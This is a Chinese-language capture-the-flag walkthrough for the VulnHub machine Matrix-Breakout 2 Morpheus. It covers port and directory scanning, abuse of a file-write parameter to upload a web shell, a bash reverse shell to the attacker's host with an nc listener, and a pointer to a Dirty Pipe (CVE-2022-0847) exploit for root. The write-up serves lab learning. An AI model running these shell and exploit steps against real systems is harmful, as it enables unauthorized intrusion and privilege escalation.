vulnhub靶场Matrix-Breakout 2 Morpheus通关攻略

1.靶场地址

https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

2.打开靶场

3.扫描靶机(192.168.159.146为kali的ip)

nmap 192.168.159.146/24

4.探测端口和服务

nmap -p- -sV 192.168.159.157

发现三个端口开启

5.目录扫描

dirsearch -u 192.168.159.157

6.查看网页

没找到什么有用的东西

7.继续目录扫描

用gobuster

gobuster dir -u http://192.168.159.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

继续扫描,gobuster字典更大

8.访问网站

9.抓包分析

发现会将内容写入txt中

10.访问graffiti.txt

11.修改文件名

抓包产生是否能修改file参数

12.上传木马

可以访问到

13.链接蚁剑

14.上传文件

上传shell.sh

bash -i >& /dev/tcp/192.168.159.146/6666 0>&1

15.kali监听

在kali监听6666端口

nc -lvnp 6666

运行命令

bash /tmp/shell.sh

16.查看内核版本

uname -a

发现漏洞

17.下载上传

https://github.com/r1is/CVE-2022-0847

下载运行即可

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值